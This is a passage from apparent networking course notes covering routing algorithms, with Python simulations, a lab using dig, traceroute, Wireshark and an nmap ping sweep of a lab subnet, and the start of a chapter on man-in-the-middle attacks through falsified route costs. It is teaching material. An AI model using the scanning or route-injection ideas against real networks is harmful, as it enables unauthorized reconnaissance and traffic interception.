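            done.add(u)
            for v, w in adj.get(u, {}).items():
                if d + w < dist.get(v, float("inf")):
                    dist[v] = d + w
                    first_hop[v] = v if u == self.rid else first_hop[u]
                    heapq.heappush(heap, (d + w, v))
        return {v: (first_hop[v], dist[v]) for v in dist if v != self.rid}


def flood(routers, topo, origin, seq, links):
    """Controlled flooding over the physical links in topo: a router forwards an
    LSP to its other neighbors only on first sight. Returns copies that crossed a link."""
    copies, pending = 0, [(origin, origin)]     # (sender, receiver)
    while pending:
        sender, rid = pending.pop(0)
        if routers[rid].receive_lsp(origin, seq, links):
            for nbr in topo[rid]:
                if nbr != sender:
                    pending.append((rid, nbr))
                    copies += 1
    return copies


# Constructed topology (undirected links listed from both ends).
TOPO = {
    26: {18: 4, 35: 2, 51: 3},
    18: {26: 4, 35: 5, 7: 1},
    35: {26: 2, 18: 5, 51: 2},
    51: {26: 3, 35: 2, 7: 1},
    7:  {51: 1, 18: 1},
}

def link_state_demo():
    """Flood everyone's first LSP and build Router 26's table; then kill the
    18-26 link, let both ends flood sequence-number-2 LSPs, and rebuild it."""
    routers = {rid: LinkStateRouter(rid) for rid in TOPO}
    for rid, links in TOPO.items():
        flood(routers, TOPO, rid, 1, links)
    before = routers[26].routing_table()

    topo2 = {rid: dict(links) for rid, links in TOPO.items()}
    del topo2[26][18], topo2[18][26]            # the link dies
    flood(routers, topo2, 26, 2, topo2[26])
    flood(routers, topo2, 18, 2, topo2[18])
    stale = routers[35].receive_lsp(26, 1, TOPO[26])   # old copy arriving late
    after = routers[26].routing_table()
    return before, after, stale

if __name__ == "__main__":
    before, after, stale = link_state_demo()
    print("Router 26 before:", before)
    print("Router 26 after 18-26 dies:", after)
    print("stale LSP accepted?", stale)
```

Before the failure, Router 26 reaches 18 directly at cost 4; afterwards it reaches 18 via 51 (51-7-18) at cost 5, and the late copy of the old sequence-1 LSP is rejected, exactly the behavior the sequence number exists to guarantee.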
The Internet's Open Shortest Path First (OSPF) protocol uses link state routing. (Open refers to the fact that the standard is "open," i.e., published, non-proprietary.)

2. Distance Vector Routing

The other routing methodology is Distance Vector Routing (also variously called Bellman-Ford Routing or Ford-Fulkerson Routing).

A. Basic Idea. Each router maintains a table:

Destination router | My guess of best distance | Which outgoing line

Each router learns its immediate (1-hop) neighbors and the distance to them. Each router shares its knowledge about the entire network with its neighbors. This table is called a vector of distances, or a distance vector. These tables are exchanged with neighbors only. When a router receives a distance vector from a neighbor, it uses that information to update its own distance vector. Routers send distance vectors periodically, whether or not changes have occurred.

To consider how the distance vector algorithm works, let's consider the network shown below: four routers in a line, with A-B a distance of 2, B-C a distance of 4, and C-D a distance of 3.

Initially, each of the four routers exchanges a Hello Packet with its neighbors, learning who their neighbors are, and the distance to their neighbors. For example, Router B receives a Hello Packet from Router A and Router C, learning that these two routers are a distance of 2 and 4 away, respectively. After this initial exchange, each of the four routers builds an initial routing table:

Router A: B 2
Router B: A 2, C 4
Router C: B 4, D 3
Router D: C 3

Now, every router shares its table with its neighbors. Consider this exchange from Router A's perspective. Router A receives from Router B the distance vector shown above.

Router B: "Hey, Router A, I have an entry in my table for Router C. Router C is a distance of 4 away from me."
Router A: "Hey, Router B, you're a genius. But, Router B, you are a distance of 2 away from me, so... Router C must be a distance of 6 away from me!!!"

So, Router A changes its routing table to:

Router A: B 2, C 6
Router C tells Router B: "Router D is a distance of 3 away from me." Router B then reasons: "Router C is a distance of 4 away from me, and Router D is a distance of 3 away from Router C, so Router D must be a distance of 7 away from me." So, Router B changes its routing table to:

Router B: A 2, C 4, D 7

In a like manner, Router C and Router D change their routing tables based on the initial exchange. Thus, after the initial exchange of packets is complete, the distance vectors are:

Router A: B 2, C 6
Router B: A 2, C 4, D 7
Router C: A 6, B 4, D 3
Router D: B 7, C 3

But... matters are not done yet! Now that routers have reconstituted their distance vectors, they exchange them again! Note that distance vectors are exchanged with neighbors only. So, Router B tells Router A: "Router D is 7 away from me." Router A then reasons: "Router D must be 9 away from me." After all routers reevaluate their distance vectors, we have this:

Router A: B 2, C 6, D 9
Router B: A 2, C 4, D 7
Router C: A 6, B 4, D 3
Router D: A 9, B 7, C 3

Hopefully this example convinces you that even though distance vectors are only exchanged with immediate neighbors, information about the full network will eventually percolate to all routers. But you are likely wondering: Okay... all the routers have distance vectors, but how do they use them for routing? To fill in this last piece of the distance-vector puzzle, let's show a more complex example (taken from the Tanenbaum text).

B. Distance Vector Routing. Consider the network shown on the left below. Further, suppose that for this scenario the weights used in the network represent time delays. Obviously, we would like data to be routed with minimal delay. You are Router J. Notice that you have four neighbors: A, I, H and K. Your delay to A is 8, your delay to I is 10, your delay to H is 12 and your delay to K is 6.
You receive the distance vectors shown below on the right (the first column is the received distance vector from Router A, the second is from Router I, the third from Router H and the last column is the received distance vector from Router K). Your goal: Write down your new estimates of distances to all nodes, and annotate your distance vector showing the next router on the best path to each destination.

[Figure: the example network (left) and the four distance vectors received by Router J (right). From Tanenbaum, Computer Networks, 3rd ed.]

To see how you would accomplish this, let's focus on how you (Router J) would determine the best way to route a packet to Router F.

o Your neighbor Router A is 8 away from you. Router A says to you: "I can get to F in 23." Thus, if you use Router A as your next hop to Router F, you will get to Router F with a delay of 31.
o Your neighbor Router I is 10 away from you. Router I says to you: "I can get to F in 20." Thus, if you use Router I as your next hop to Router F, you will get to Router F with a delay of 30.
o Your neighbor Router H is 12 away from you. Router H says to you: "I can get to F in 19." Thus, if you use Router H as your next hop to Router F, you will get to Router F with a delay of 31.
o Your neighbor Router K is 6 away from you. Router K says to you: "I can get to F in 40." Thus, if you use Router K as your next hop to Router F, you will get to Router F with a delay of 46.

Comparing these four values, you (Router J) conclude that the best way to route a packet to Router F is to send it to Router I. The total delay from Router J to Router F will be 30.

Practice Problem 15.3

You are Router J. Notice that you have four neighbors: A, I, H and K. Your delay to A is 8, your delay to I is 10, your delay to H is 12 and your delay to K is 6.[25] You receive the distance vectors shown below on the right (the first column is the received distance vector from Router A, the second is from Router I, the third from Router H and the last column is the received distance vector from Router K).
Write down your new estimates of distances to all nodes, and annotate your distance vector showing the next router on the best path to each destination.

[Figure: the example network and the four received distance vectors. From Tanenbaum, Computer Networks, 3rd ed.]

Solution:

[25] Note that it is not necessary that the delay between two nodes be the same in each direction. So, for example, it is perfectly valid for the delay from J to A to be 8, while the delay from A to J is a different value (e.g., 9).

C. The "Count to Infinity" Problem in Distance Vector Routing

Consider the three-node network shown below. Atop Node A and Node B, we show the entry in their routing table for Node X. Node X is a distance of 2 away from Node A. Node X is a distance of 6 away from Node B. All is well.

[Figure 22.17, Two-node instability, from Forouzan, Data Communications and Networking, McGraw Hill, 2007: Node X is a neighbor of Node A, and Node A is a distance of 4 from Node B. Entry for X at A: 2. Entry for X at B: 6.]

Then Node X dies. Node A does not receive a Hello packet and realizes Node X must have died. It adjusts its routing table to show that Node X is unreachable (a distance of infinity away).

Then, something weird happens, and it has nothing to do with the fact that the At Hoc alert announcing the active shooter drill ended at 1046 did not actually get promulgated until 1245. Rather, this happens: Router A receives a distance vector from Router B saying "I can reach Router X in a distance of 6." Then... what do you do as Router A? You know that Router B is a distance of 4 away from you... and he's saying that he can reach X in a distance of 6... You update your routing table!

Then you share your distance vector with B, and she updates her routing entry for X. This exchange continues back and forth, until the cows come home, or until the cows come home blue in the face, or until the cows come home blue in the face on a cold day in hell.

How can we limit or mitigate this instability?
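The update rule from sections 2.A and 2.B (Router A learning C and then D in the four-router line, and Router J picking its next hop to F) and the two-node exchange of section 2.C, replayed in code. This is an added example, not code from the EC310 notes; the link costs and advertised distances are the ones quoted in the text, the alternating order of the A/B exchanges follows the narration above, and the `infinity` cutoff anticipates the "finite number = infinity" idea discussed next.

```python
# Added example (not from the EC310 notes): a router's distance-vector update,
# applied to the examples in the text. Costs are the text's; the alternating
# A-then-B order of exchanges in count_to_infinity is an assumption that
# follows the narration.

def update_distance_vector(me, my_delays, received):
    """Return {destination: (best_total_cost, next_hop)} for router `me`.

    my_delays: {neighbor: delay of the direct link to that neighbor}
    received:  {neighbor: {destination: cost that neighbor advertises}}

    For every neighbor N and every destination X that N advertises, the
    candidate cost is delay(me, N) + N's advertised cost to X. The smallest
    candidate wins and N becomes the next hop for X. A neighbor is always
    reachable directly, so it is treated as advertising itself at cost 0.
    """
    best = {}
    for neighbor, link_delay in my_delays.items():
        advertised = {neighbor: 0}
        advertised.update(received.get(neighbor, {}))
        for dest, cost in advertised.items():
            if dest == me:
                continue  # a router keeps no route to itself
            total = link_delay + cost
            if dest not in best or total < best[dest][0]:
                best[dest] = (total, neighbor)
    return best


def router_j_example():
    """Router J's entry for F as worked in the text: delay 30 via Router I."""
    delays = {"A": 8, "I": 10, "H": 12, "K": 6}
    vectors = {"A": {"F": 23}, "I": {"F": 20}, "H": {"F": 19}, "K": {"F": 40}}
    return update_distance_vector("J", delays, vectors)["F"]


def line_network_example():
    """Router A in the A-B-C-D line: the first exchange teaches it C (6),
    the second teaches it D (9), both via B."""
    after_first = update_distance_vector("A", {"B": 2}, {"B": {"A": 2, "C": 4}})
    after_second = update_distance_vector("A", {"B": 2}, {"B": {"A": 2, "C": 4, "D": 7}})
    return after_first, after_second


def count_to_infinity(a_to_b=4, b_cost_to_x=6, infinity=30):
    """Replay A and B updating their entry for dead router X with the same rule.

    A has already dropped X; B still believes X is b_cost_to_x away (via A).
    Any cost >= `infinity` is treated as unreachable. Returns (exchanges,
    history): how many exchanges pass before both agree X is unreachable,
    and the sequence of (router, new_cost_to_X) updates.
    """
    if infinity == float("inf"):
        raise ValueError("a finite 'infinity' is required, or the loop never ends")
    a_vec = {}                      # A's advertised vector: X is gone
    b_vec = {"X": b_cost_to_x}      # B's stale entry for X
    history, exchanges = [], 0

    def capped(table):
        return {dest: min(infinity, cost) for dest, (cost, _) in table.items()}

    while a_vec.get("X", infinity) < infinity or b_vec.get("X", infinity) < infinity:
        exchanges += 1
        if exchanges % 2:   # odd exchanges: A listens to B
            a_vec = capped(update_distance_vector("A", {"B": a_to_b}, {"B": b_vec}))
            history.append(("A", a_vec["X"]))
        else:               # even exchanges: B listens to A
            b_vec = capped(update_distance_vector("B", {"A": a_to_b}, {"A": a_vec}))
            history.append(("B", b_vec["X"]))
    return exchanges, history


if __name__ == "__main__":
    print("J -> F:", router_j_example())                 # (30, 'I')
    first, second = line_network_example()
    print("A after 1st exchange:", first)                # {'B': (2, 'B'), 'C': (6, 'B')}
    print("A after 2nd exchange:", second)               # adds 'D': (9, 'B')
    for inf in (30, 16):
        n, steps = count_to_infinity(infinity=inf)
        print(f"infinity={inf}: {n} exchanges", steps)
```

With `infinity=30` the history runs 10, 14, 18, 22, 26, 30, 30: seven exchanges before both routers give up on X, which is the count stated in the text; with the hop-count convention of 16 it takes four.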
One proposed solution is to set some finite number = ∞. If we set, for example, 30 = ∞, then after seven distance vector exchanges in the example above, both Router A and Router B would have concluded that Router X was unreachable. Most distance vector routing uses a hop-count metric, which means that the weight on each edge is equal to one. To avoid the count-to-infinity problem, many algorithms set 16 = ∞.

3. Routing Protocol Summary

Link State Routing:
o Each router does its own calculations (Dijkstra) independent of other routers.
o Convergence is better because calculations are local.
o Better scalability.
But...
o Uses flooding.

Distance Vector Routing:
o Is easy to implement.
o In a static environment, the algorithm will correctly compute shortest paths to all destinations.
But...
o In a dynamic environment route computations might not stabilize and/or might be incorrect.
o The algorithm does not scale well.

Practice Problem 15.4

In the event that router G experienced a fatal power supply failure, which protocol would be best suited to recovering from this failure and sharing correct routing information?
(a) Link State Routing
(b) Distance Vector Routing
(c) Both protocols are robust and would be unaffected by this anomaly.

Solution:

Problems

1. Concerning routing algorithms:
(a) Compare how well link-state algorithms and distance vector algorithms respond in the event of a router failure.
(b) Suppose a network uses distance vector routing. What would happen if a router sent a distance vector with all zeroes?
(c) Describe the "count-to-infinity" problem. (Use a picture if you find it helpful.)
(d) In distance vector routing, each router receives distance vectors from (choose one):
(i) Every router in the network
(ii) Its one-hop neighbors
(iii) DHCP
(iv) The table set up by the network administrator
(v) Messages exchanged using ARP

2. Consider the network shown below which uses distance vector routing. You are router C.
You have just received the following distance vectors:

Destination   From B   From D   From E
A             4        17       8
B             0        11       6
C             8        6        2
D             13       0        10
E             7        8        0
F             2        10       4

Your distances to B, D and E are 7, 4 and 6, respectively. What is your new routing table (include the distance and next hop for each destination)?

[Network diagram: routers A through F; you are Router C, with neighbors B, D and E.]

3. Consider the network whose graph is shown below. Assume link-state routing is used.
(a) Which routers does Router C send LSPs to?
(b) Sketch the LSP sent by Router C.
(c) Show the correct routing table for Router C.
(d) Show the correct routing table for Router E.

4. Determine the correct routing table for Router A in the figure below.

5. Fill in the blanks for the below statements that describe the two major categories of routing protocols.
(a) In _____________________ routing, a router will tell its immediate neighbors what it knows about the entire network.
(b) In _____________________ routing, a router will tell the entire network what it knows about its immediate neighbor (controlled flooding).

6. Complete the partial routing table for Router C for the destinations listed below.

Destination   Next element   Total cost
A
B
C             ---            0
D
E

Security Exercise 15

Introduction

Let's put to use the networking skills we have learned to date to better understand routing at the router.

1. Set-Up

Equipment required:

Your issued Laptop.
o Turn off the wireless adapter.
o Connect the blue Ethernet cable at your desk to your issued laptop.

A printed or electronic copy of this security exercise.
o If printed, separate the network diagram and answer sheet and have them ready to fill in.

VMware Workstation
o Power on your Cyber2 VM, then click VM and Settings.
o Select Network Adapter and ensure that Connected, Connected at power on, and Bridged: Connected directly to the physical network, and Replicate physical network connection state are selected or checked, then click OK.
o Open a terminal in your Cyber2 VM and execute the command

sudo dhclient

Once it finishes, execute the command

ifconfig

Your screen should look similar to Figure 1. Interface eth1 should be assigned an IP address of 192.168.XX.1YY, where XX is your classroom number and YY is a number between 0 and 254. If not, notify your instructor or lab technician.

Figure 1 – ifconfig executed after initial lab setup.

Part 1: Getting the Lay of the Land

2. Where Am I?

Locate EC310 MID on your network diagram. This is your Cyber2 VM which has just joined a virtual network in a virtual world. You have an Ethernet card in your virtual machine called eth1 that has been assigned an IP address on the virtual network. Identify a) your IP address and compute b) your network address and network mask in CIDR notation using the information from ifconfig. Label parts a) and b) of your network diagram.

In order for your packets to leave this virtual network and venture out into the virtual world, your virtual machine must send them to a Gateway Router. Router A is serving this purpose for the network you are connected to. To send your packets to Router A and out into the world, you must know its IP address first. Execute the command

route -n

Identify the IP address of the Gateway Router. Look under the Gateway column of the Kernel's IP routing table (see Figure 1 for reference). Recall that address 0.0.0.0 is used to represent any IP address and is not the Gateway Router's address. Label part c) of your network diagram.

3. Where Do I Go Next?

In this virtual world there is an important website located at http://www.usna.edu. Verify the website www.usna.edu exists by opening Firefox and navigating to the website address. Access Firefox by selecting Applications, Internet, Firefox from the system toolbar at the top of your virtual machine (see the figure below for reference). Browse the website to see what information is available.
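The two computations step 2 asks for (network address and mask in CIDR notation, and the gateway from `route -n`), done programmatically. This is an added example and not part of the EC310 exercise; the interface values and the routing-table text are constructed sample data (192.168.65.101 with mask 255.255.255.0, gateway 192.168.65.1), not the addresses your VM will actually receive.

```python
# Added example (not part of the EC310 exercise): derive the network address
# and CIDR mask from an interface's IP and netmask, and pick the gateway out
# of `route -n` output. All values below are constructed sample data.
import ipaddress

SAMPLE_IP, SAMPLE_MASK = "192.168.65.101", "255.255.255.0"   # constructed

SAMPLE_ROUTE_N = """\
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.65.1    0.0.0.0         UG    0      0        0 eth1
192.168.65.0    0.0.0.0         255.255.255.0   U     0      0        0 eth1
"""   # constructed to match the column layout of `route -n`


def network_in_cidr(ip, netmask):
    """'192.168.65.101', '255.255.255.0' -> '192.168.65.0/24'."""
    return str(ipaddress.ip_interface(f"{ip}/{netmask}").network)


def default_gateway(route_n_output):
    """Return the Gateway of the default route (Destination 0.0.0.0).

    A Gateway of 0.0.0.0 means "deliver directly, no router in between", so a
    row whose gateway is 0.0.0.0 is never the answer. Returns None if the
    table has no default route.
    """
    for line in route_n_output.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[0] == "0.0.0.0" and fields[1] != "0.0.0.0":
            return fields[1]
    return None


def gateway_is_on_link(ip, netmask, gateway):
    """Sanity check: the gateway must sit inside the host's own network,
    otherwise the host has no way to hand packets to it."""
    net = ipaddress.ip_interface(f"{ip}/{netmask}").network
    return ipaddress.ip_address(gateway) in net


if __name__ == "__main__":
    print(network_in_cidr(SAMPLE_IP, SAMPLE_MASK))              # 192.168.65.0/24
    gw = default_gateway(SAMPLE_ROUTE_N)
    print(gw, gateway_is_on_link(SAMPLE_IP, SAMPLE_MASK, gw))   # 192.168.65.1 True
```

To use it on your own VM, paste the `inet addr` and `Mask` values from `ifconfig` in place of the sample ones and the output of `route -n` in place of `SAMPLE_ROUTE_N`.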
Question 1: Who maintains the website at www.usna.edu?

In order for your virtual machine to access this website it first must know the webserver's IP address. Recall from SI110 that the Domain Name System (DNS) provides a convenient way for us to remember a website's name rather than a bunch of numbers for an IP address. Both are interchangeable through a series of 'phonebooks' (DNS name servers) on the Internet that perform lookups on our behalf. If you provide the phonebook (DNS name server) the name of the webserver you would like to access, it will give you its IP address in response, or vice versa, as shown in the example in Figure 2 below.

Figure 2 – DNS query and response.

The query above was generated using a utility called dig to find the IP address for www.cynicalmids.tumblr.com. dig allows you to query a DNS name server and resolve a name to its IP address. Identify the IP address of the website www.usna.edu by executing the following command

dig www.usna.edu

Label part d) of your network diagram with the IP address belonging to the eth0 interface of the webserver www.usna.edu.

4. How Do I Get There?

There are two methods to discover information about the path between you and the webserver www.usna.edu. The first method is the utility ping with record route. It will tell you the IP addresses of the OUTGOING interfaces along the way to and from the final destination.

Figure 3 – Example use of ping with record route option.

For example, in Figure 3, after the command

ping -R -c1 -n 2.2.2.15

is executed, the OUTGOING interfaces are listed in order beginning with:
1) 3.3.3.5 – the host computer's interface.
2) 2.2.2.1 – Router A's eth1.
3) 2.2.2.15 – the webserver's interface.

The OUTGOING interfaces of the return trip are listed in order beginning with:
4) 2.2.2.15 – the webserver's interface.
5) 3.3.3.1 – Router A's eth0.
6) 3.3.3.5 – the host computer's interface.
Identify the IP addresses of the interfaces traversed between you and the webserver www.usna.edu using the ping command (do not forget the -R and -c1 and -n options). Label parts e) through g) of your network diagram.

The second method is the utility traceroute, which works similarly to ping, except it tells you the address of the INCOMING interface along the path between you and your destination. For example, in Figure 4, after the command

traceroute -n 2.2.2.15

is executed, the INCOMING interfaces are listed in order beginning with:
1) 3.3.3.1 – Router A's INCOMING interface.
2) 2.2.2.15 – the webserver's interface.

Execute a traceroute to the webserver www.usna.edu (do not forget the -n option).

Question 2: Compare your traceroute results with your network diagram. Did they match the expected results obtained from the ping command?

Figure 4 – Example of traceroute command.

5. Is Anyone Else Out There?

Routers B and C are also present in this virtual world and are responsible for forwarding packets between the networks they are connected to and learning about other networks from other routers. Recall from Lecture #15 that routers learn about each other's networks by using a routing protocol such as the Open Shortest Path First (OSPF) protocol. In OSPF, routers use Link State Packets (LSPs) to communicate with each other and learn about the network topology. Let's take a closer look at this communication.

Launch Wireshark (as root) by selecting Applications, Internet, Wireshark (as root) from the system toolbar at the top of your virtual machine. Open the packet capture labeled sx15 in the ec310code folder in your home directory. Examine the captured OSPF hello packets in the packet details pane. Be sure to expand the OSPF Header and the OSPF Hello Packet portions (see the figure below for reference). These packets were captured from one of the routers in your virtual world.
Recall from Lesson 15 that in OSPF routers send Hello Packets at a specific interval in order to let other routers know they are alive. This interval is called the Hello Interval.

Question 3: Using the information in the captured Hello Packets, what is the Hello Interval for the router they were captured from?

Verify the Hello Interval by observing the amount of time between two OSPF hello packets in your packet capture. Is it equal to the Hello Interval?

If after a certain amount of time a router does not receive a Hello Packet from another router it deems that router to be 'dead' and removes all routes that were advertised by that router. The time duration before a router is declared dead is known as the Dead Interval. This allows OSPF to respond well to dynamic changes in the network topology.

Question 4: What is the Dead Interval for the router's captured Hello Packets? If you could stop a router's hello packets from being advertised, would you disable that router?

Hello Packets also serve the important function of beginning a neighbor association between two routers when they first meet. Before the new routers agree to swap routing information they must agree on a basic set of parameters and become neighbors first. A router begins this process by identifying itself in the OSPF Header of the packet under the Source OSPF Router field.

Question 5: Look inside the OSPF Header of the captured Hello Packet. What IP address is listed in the Source OSPF Router field (note: this IP address does not begin with 192.168.65.XX)? This IP address is very important. It is known as the Router's ID and uniquely identifies this router to all other routers.

Who is responsible for assigning IP addresses anyway? The network administrator is responsible for assigning IP addresses among many other tasks in maintaining the network. They assign blocks of IP addresses as part of the design of the network architecture to best meet the needs of their clients.
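What Wireshark is decoding for you in Questions 3 to 5 is a fixed binary layout. The following added example (not part of the EC310 exercise) parses an OSPFv2 Hello packet by hand, following the field order in RFC 2328 (Appendix A.3.1 for the 24-byte header, A.3.2 for the Hello body), and checks capture timestamps against the advertised Hello Interval. The packet bytes are constructed here with a Router ID of 10.0.0.1, a Hello Interval of 10 and a Dead Interval of 40, and a zero checksum; the values in the sx15 capture are whatever Wireshark shows you.

```python
# Added example (not part of the EC310 exercise): decode an OSPFv2 Hello
# packet per RFC 2328 Appendix A.3. The sample packet is constructed below;
# its Router ID, intervals and neighbor are invented, and the checksum is
# left at zero (this code does not verify it).
import ipaddress
import struct

OSPF_HEADER = "!BBH4s4sHH8s"   # version, type, length, router ID, area ID, checksum, AuType, authentication
HELLO_FIXED = "!4sHBBI4s4s"    # network mask, HelloInterval, options, priority, RouterDeadInterval, DR, BDR
HELLO_TYPE = 1


def _ip(text):
    return ipaddress.ip_address(text).packed


def build_hello(router_id, area_id, netmask, hello, dead, dr, bdr, neighbors=()):
    """Construct sample Hello bytes (test data only; this is not a packet sender)."""
    body = struct.pack(HELLO_FIXED, _ip(netmask), hello, 0x02, 1, dead, _ip(dr), _ip(bdr))
    body += b"".join(_ip(n) for n in neighbors)
    length = struct.calcsize(OSPF_HEADER) + len(body)
    header = struct.pack(OSPF_HEADER, 2, HELLO_TYPE, length, _ip(router_id), _ip(area_id),
                         0, 0, bytes(8))   # checksum 0, AuType 0 (null authentication)
    return header + body


def parse_hello(packet):
    """Return the Hello fields as a dict; raise ValueError if it is not an OSPFv2 Hello."""
    version, ptype, length, rid, aid, _csum, autype, _auth = struct.unpack_from(OSPF_HEADER, packet, 0)
    if version != 2 or ptype != HELLO_TYPE:
        raise ValueError("not an OSPFv2 Hello packet")
    if length != len(packet):
        raise ValueError("packet length field does not match the data")
    off = struct.calcsize(OSPF_HEADER)
    mask, hello, _options, prio, dead, dr, bdr = struct.unpack_from(HELLO_FIXED, packet, off)
    off += struct.calcsize(HELLO_FIXED)
    neighbors = [str(ipaddress.ip_address(packet[i:i + 4])) for i in range(off, length, 4)]
    return {
        "router_id": str(ipaddress.ip_address(rid)),   # "Source OSPF Router" in Wireshark
        "area_id": str(ipaddress.ip_address(aid)),
        "auth_type": autype,
        "network_mask": str(ipaddress.ip_address(mask)),
        "hello_interval": hello,
        "dead_interval": dead,
        "priority": prio,
        "designated_router": str(ipaddress.ip_address(dr)),
        "backup_dr": str(ipaddress.ip_address(bdr)),
        "neighbors": neighbors,
    }


def hellos_match_interval(arrival_times, hello_interval, tolerance=1.0):
    """True if consecutive capture timestamps (seconds) are hello_interval apart."""
    gaps = [later - earlier for earlier, later in zip(arrival_times, arrival_times[1:])]
    return bool(gaps) and all(abs(g - hello_interval) <= tolerance for g in gaps)


SAMPLE_HELLO = build_hello("10.0.0.1", "0.0.0.0", "255.255.255.0", 10, 40,
                           "192.168.65.2", "0.0.0.0", ["10.0.0.2"])   # constructed

if __name__ == "__main__":
    fields = parse_hello(SAMPLE_HELLO)
    print(fields["router_id"], fields["hello_interval"], fields["dead_interval"])  # 10.0.0.1 10 40
    print(hellos_match_interval([0.0, 10.0, 20.1, 29.9], fields["hello_interval"]))  # True
```

The Dead Interval is what a monitoring tool should watch: if Hellos from a Router ID stop arriving for that long, its neighbors will drop every route it advertised, which is the "would you disable that router?" question above.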
What are the routers talking about with each other and why do they need to communicate so often? There are a number of internal measures routers use in order to increase efficiency and prevent unnecessary information from clogging up the network, such as electing a Designated Router (DR) and Backup Designated Router (BDR) and managing Link State Updates (LSU). To learn more about OSPF, see http://www.ietf.org/rfc/rfc2328.txt.

6. Could Anyone Hurt Me?

Lastly, an evil instructor (because aren't all instructors evil?) is also present in this virtual world. He or she is located on the 5.5.5.0/25 network and your final task is to find him or her. nmap is a powerful utility which allows us to scan networks and identify which hosts are active, among many other useful tasks. Execute the command below to scan the 5.5.5.0/25 network and determine which hosts are 'up' (i.e., active). It may take a few minutes.

nmap -sP 5.5.5.0/25

Use traceroute or ping to identify the path to each of the hosts identified as 'up' by nmap.

Question 6: Using your network diagram and the results from traceroute or ping, what is the most likely IP address of the evil instructor? Confirm the IP address identified with your instructor or lab technician. Label part h) of your network diagram.

Use traceroute or ping to verify the interfaces between you and the evil instructor. Label parts i) through k) on your network diagram.

7. Clean Up

VMware Workstation
o In the VMware Workstation menu click VM and Settings.
o Select Network Adapter and ensure that Connected, and Connected at power on, are unchecked, and ensure that Host-only: A private network shared with the host is selected or checked, then click OK.
o Suspend your Cyber2 VM.

Disconnect the blue Ethernet cable. Turn on your wireless adapter.
Security Exercise 15 Answer Sheet

Name:

Question 1:

Question 2:

Question 3:

Question 4:

Question 5:

Question 6:

[Network diagram for EC310 Security Exercise 15 & 16, with blanks a) through m) to fill in: EC310 MID (eth1; parts a and b), Router A (RA, eth3/eth4/eth5; part c is its gateway address, part e an interface), Router B (RB, eth2/eth3; part i), Router C (RC, eth3/eth4/eth5; parts f, g, j, k), the webserver www.usna.edu (web, eth0; parts d and m), and the Evil Instructor (EVL, eth0; part h, SX#16 only). Networks shown: 1.1.1.0/29, 2.2.2.0/29, 4.4.4.0/24 (with address 4.4.4.1), 4.4.5.0/24 and 5.5.5.0/25.]

Chapter 16: The Man-In-The-Middle Attack

Objectives:
(a) Describe the Man-In-The-Middle (MITM) attack and list what advantages it provides the attacker.
(b) Construct a routing table based on a network diagram and manipulate a routing table to exploit a specific target.
(c) Describe the steps that should be taken to prevent false route injection and identify who is responsible for performing these preventative actions and how they can be applied.

I. Trust

1. A Quick Review

Where are we at in our understanding of how networks interconnect? We've talked about routing algorithms and how these weird things called routing tables are constructed; we've talked about the layers and protocols involved in networking; we've also talked about addressing schemes and specifically how MAC addresses and IP addresses are used; but, what is the point of all this? Much like the host section in the first six weeks of EC310, we need to understand how networks work before we can manipulate their operation and violate the principles of security. Much like a locksmith, once we understand how a lock operates, we know that a key is not the only thing that can open a door. If we are thinking like a locksmith about networks from a security perspective, what is the underlying assumption between routers in the routing algorithms they use to construct their routing tables?
The assumption is that each router can trust the information that other routers are sending it. That is, Router A assumes by default that Router B is telling the truth about the state of its links or the distance between it and other routers. But what happens when that is not the case? Would a machine ever lie to another machine? Are there evil machines out there that want to do bad, mean, horrible things to people? Gasp, what if it was true! Have you ever seen Terminator 2: Judgment Day!? Sadly, most of your classmates were not born when this movie released, but I highly recommend it for your Netflix queue. You will not be able to call yourself a hacker until you watch it.

Practice Problem 16.1

Consider the network below. How would the routing tables evolve using distance vector routing?

[Network diagram: Routers A, B, C and D with links A-B (cost 4), A-C (cost 5), B-D (cost 2) and C-D (cost 2).]

Router A
Destination   Next Hop   Cost
B             B          4
C             C          5
D             -          ∞

Router B
Destination   Next Hop   Cost
A             A          4
C             -          ∞
D             D          2

Router C
Destination   Next Hop   Cost
A             A          5
B             -          ∞
D             D          2

Router D
Destination   Next Hop   Cost
A             -          ∞
B             B          2
C             C          2

Everyone shares its table with its neighbors.

Solution:

But what if Router C was evil and began to falsify information about its link to Router A; how would the routing table change?

Router A
Destination   Next Hop   Cost
B             B          4
C             C          5
D             -          ∞

Router B
Destination   Next Hop   Cost
A             A          4
C             -          ∞
D             D          2

Router C
Destination   Next Hop   Cost
A             A          1
B             -          ∞
D             D          2

Router D
Destination   Next Hop   Cost
A             -          ∞
B             B          2
C             C          2

Everyone shares its table with its neighbors.

Solution:

What does this mean for all of Router D's traffic destined for Router A? More importantly, why would Router D's traffic go through Router C instead?

Fortunately, machines cannot lie to one another, but the humans that operate the machines do lie (or make mistakes) and can force the machines to do the same. In the previous example, we saw how a simple lie about the distance between two routers could change the direction of traffic flow within the network, but why is this of concern?
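Practice Problem 16.1 run to convergence in code, first with every router honest and then with Router C advertising a false cost of 1 to Router A. This is an added example, not code from the EC310 notes; the link costs (A-B 4, A-C 5, B-D 2, C-D 2) and the lie are the ones in the problem, and the synchronous "everyone shares its table at once" exchange is an assumption that matches the problem's wording.

```python
# Added example (not from the EC310 notes): distance-vector routing for the
# four-router network of Practice Problem 16.1, honest and with Router C
# lying about its cost to Router A. Synchronous rounds are an assumption.

LINKS = {("A", "B"): 4, ("A", "C"): 5, ("B", "D"): 2, ("C", "D"): 2}


def neighbors_of(links):
    """{router: {neighbor: link_cost}} from an undirected link list."""
    nbrs = {}
    for (u, v), cost in links.items():
        nbrs.setdefault(u, {})[v] = cost
        nbrs.setdefault(v, {})[u] = cost
    return nbrs


def run_distance_vector(links, lies=None, max_rounds=20):
    """Exchange distance vectors between neighbors until no table changes.

    lies: {(liar, destination): advertised_cost} overrides what `liar` tells
    its neighbors about `destination`; the liar's own table is not changed.
    Returns {router: {destination: (cost, next_hop)}}.
    """
    lies = lies or {}
    nbrs = neighbors_of(links)
    # Initial tables: self at 0, direct neighbors at link cost, nothing else (the "infinity" rows).
    tables = {r: {r: (0, None)} for r in nbrs}
    for r, ns in nbrs.items():
        for n, c in ns.items():
            tables[r][n] = (c, n)

    for _ in range(max_rounds):
        # Everyone shares its table with its neighbors: snapshot what each router advertises.
        adverts = {r: {d: lies.get((r, d), cost) for d, (cost, _) in t.items()}
                   for r, t in tables.items()}
        new_tables, changed = {}, False
        for r, ns in nbrs.items():
            table = {r: (0, None)}
            for n, link_cost in ns.items():
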